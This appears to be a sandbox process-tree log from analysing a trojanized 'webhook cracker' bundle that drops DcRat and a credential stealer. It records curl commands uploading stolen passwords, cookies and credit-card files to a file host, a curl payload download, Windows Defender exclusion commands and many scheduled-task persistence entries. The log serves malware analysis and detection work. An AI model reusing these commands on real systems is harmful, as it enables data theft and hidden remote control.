- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1972
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\Install.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\Install.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4100
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\$77XD.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\$77XD.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4724
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\$77MicrosoftData"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4100
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3404
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\$77MicrosoftData\$77$77svchost.exe.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:724
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9342.tmp.bat""
    3⤵
    PID:5692
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5924
  - - C:\Users\Admin\AppData\Roaming\$77MicrosoftData\$77$77svchost.exe.exe
      "C:\Users\Admin\AppData\Roaming\$77MicrosoftData\$77$77svchost.exe.exe"
      4⤵
      PID:6208
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77$77svchost.exe.exe
        5⤵
        
        PID:6176
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77$77svchost.exe.exe" /TR "C:\Users\Admin\AppData\Roaming\$77MicrosoftData\$77$77svchost.exe.exe \"\$77$77svchost.exe.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        5⤵
        DcRat
        Scheduled Task/Job: Scheduled Task
        
        PID:6488
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77$77svchost.exe.exe
        5⤵
        
        PID:7064
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "$77svchost.exe_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        5⤵
        DcRat
        Scheduled Task/Job: Scheduled Task
        
        PID:6592
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe"
  2⤵
  PID:2260
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe"
  2⤵
  PID:2184
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2184 -s 228
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:2932
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\Xsploit Inject Fix.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\Xsploit Inject Fix.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1952
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Bridgereviewhostdhcp\QvcddhawIRZ4U7hBhZE9IYIsN.vbe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    PID:440
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Bridgereviewhostdhcp\DLNYcJf.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:4192
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4884
    - - C:\Bridgereviewhostdhcp\webhostdll.exe
        
        "C:\Bridgereviewhostdhcp\webhostdll.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:5068
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgereviewhostdhcp\webhostdll.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4724
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\Idle.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5844
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Idle.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5812
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5804
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\webhostdll.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5832
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\OfficeClickToRun.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\sihost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5912
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\dllhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5664
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\WmiPrvSE.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5712
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\DESIGNER\csrss.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5888
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\conhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5972
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Crashpad\reports\RuntimeBroker.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6088
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Performance\WinSAT\DataStore\RuntimeBroker.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1472
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgereviewhostdhcp\MoUsoCoreWorker.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5128
      - C:\Users\Admin\Downloads\Idle.exe
        
        "C:\Users\Admin\Downloads\Idle.exe"
        6⤵
        
        PID:6836
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e9ad25f8-001f-4406-bdb0-35e855ed9302.vbs"
        7⤵
        
        PID:2552
        
        C:\Users\Admin\Downloads\Idle.exe
        
        C:\Users\Admin\Downloads\Idle.exe
        8⤵
        
        PID:4596
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02b28c63-abec-46fa-b6d9-687b5abbbb56.vbs"
        7⤵
        
        PID:6884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\App-webhook-Cracker-main\WebhookCracker.bat" "
  2⤵
  PID:5076
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of FindShellTrayWindow
    PID:2256
- - C:\Windows\system32\curl.exe
    curl --insecure https://public.bn.files.1drv.com/y4m-BcWm4Ds2apkE0tPu0hSa3n7Wql3BZeKuQkrd7Xbc2Muj9NVAO0GnMlK39nvHT6hgid1YX8tADRDIziIIogVcGDFsVL2vjKQ51m92ffSv1ZxKdnRrsT0PCjo9y77aObXEJlg1oDeNdbxaACWfuU7iB5iF-Gix_QhEYt3aDKE6Swt-ALb2Ix8hgZPZ9BmW1BKSaWCPS4f7X9661oNMSR0jw6zJ2Xfze15y2AUTr3VV1c?AVOverride=1 --output C:\Users\Admin\AppData\Local\Temp\hah.exe
    3⤵
    PID:4232
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\svchost.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\svchost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5104
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "jusched" /tr '"C:\Users\Admin\AppData\Roaming\jusched.exe"' & exit
    3⤵
    PID:1800
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:320
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "jusched" /tr '"C:\Users\Admin\AppData\Roaming\jusched.exe"'
      4⤵
      DcRat
      Scheduled Task/Job: Scheduled Task
      PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7B84.tmp.bat""
    3⤵
    PID:3004
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3960
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1712
  - - C:\Users\Admin\AppData\Roaming\jusched.exe
      "C:\Users\Admin\AppData\Roaming\jusched.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2528
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"
  2⤵
  PID:1624
- - C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe
    "C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:4332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:4784
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:5440
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:5616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:6464
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:6628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:6868
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:6424
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\JOKER.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\JOKER.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3288
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\Install.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\Install.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3624
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe"
  2⤵
  PID:4500
- - C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe
    "C:\Users\Admin\Desktop\App-webhook-Cracker-main\creal.exe"
    3⤵
    PID:5456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:5628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:6100
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:6676
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:5368
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:6664
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:6116
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:6676
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:4324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:7040
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupGroup.emf" https://store4.gofile.io/uploadFile"
      4⤵
      PID:7016
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Desktop/BackupGroup.emf" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:6616
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"
  2⤵
  PID:5768
- - C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe
    "C:\Users\Admin\Desktop\App-webhook-Cracker-main\main.exe"
    3⤵
    PID:5384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:6096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:6300
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:5028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:6192
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:5124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:6452
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:6948
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\svchost.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\svchost.exe"
  2⤵
  PID:5992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\App-webhook-Cracker-main\WebhookCracker.bat" "
  2⤵
  PID:5764
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe"
  2⤵
  PID:468
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Application Frame Hostㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ" /sc ONLOGON /tr "C:\Users\Admin\Desktop\App-webhook-Cracker-main\whatb.exe" /rl HIGHEST /f
    3⤵
    - DcRat
    - Scheduled Task/Job: Scheduled Task
    PID:5676
- - C:\Users\Admin\AppData\Roaming\5781\Application Frame Host.exe
    "C:\Users\Admin\AppData\Roaming\5781\Application Frame Host.exe"
    3⤵
    PID:1944
- C:\Users\Admin\Desktop\App-webhook-Cracker-main\Xsploit Inject Fix.exe
  "C:\Users\Admin\Desktop\App-webhook-Cracker-main\Xsploit Inject Fix.exe"
  2⤵
  PID:6940
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Bridgereviewhostdhcp\QvcddhawIRZ4U7hBhZE9IYIsN.vbe"
    3⤵
    PID:5052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Bridgereviewhostdhcp\DLNYcJf.bat" "
      4⤵
      PID:4348
    - - C:\Bridgereviewhostdhcp\webhostdll.exe
        
        "C:\Bridgereviewhostdhcp\webhostdll.exe"
        5⤵
        
        PID:3128
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\App-webhook-Cracker-main\vault\downloads.txt
  2⤵
  PID:840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3180

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3604

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3812

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3996

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3500

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2800

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2104

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:232

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1684

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2392

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3880

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4420

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:2644
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Windows\Migration\WTR\Idle.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:4496
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\Idle.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:320
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\Idle.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:4208
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Downloads\Idle.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:316
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\Idle.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2808
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Downloads\Idle.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:1432
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:64
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:1844
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\explorer.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2528
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "webhostdllw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\webhostdll.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2604
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "webhostdll" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\webhostdll.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:1432
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "webhostdllw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\webhostdll.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:4208
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Default\OfficeClickToRun.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2808
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\OfficeClickToRun.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:1716
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Users\Default\OfficeClickToRun.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2080
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Windows\TAPI\sihost.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:3948
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\TAPI\sihost.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:4368
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\sihost.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2184
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\MSBuild\Microsoft\dllhost.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:3464
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\dllhost.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:3624
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\Microsoft\dllhost.exe'" /rl HIGHEST /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:2632
- C:\Windows\system32\schtasks.exe
  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AccountPictures\WmiPrvSE.exe'" /f
  2⤵
  - DcRat
  - Process spawned unexpected child process
  - Scheduled Task/Job: Scheduled Task
  PID:3156
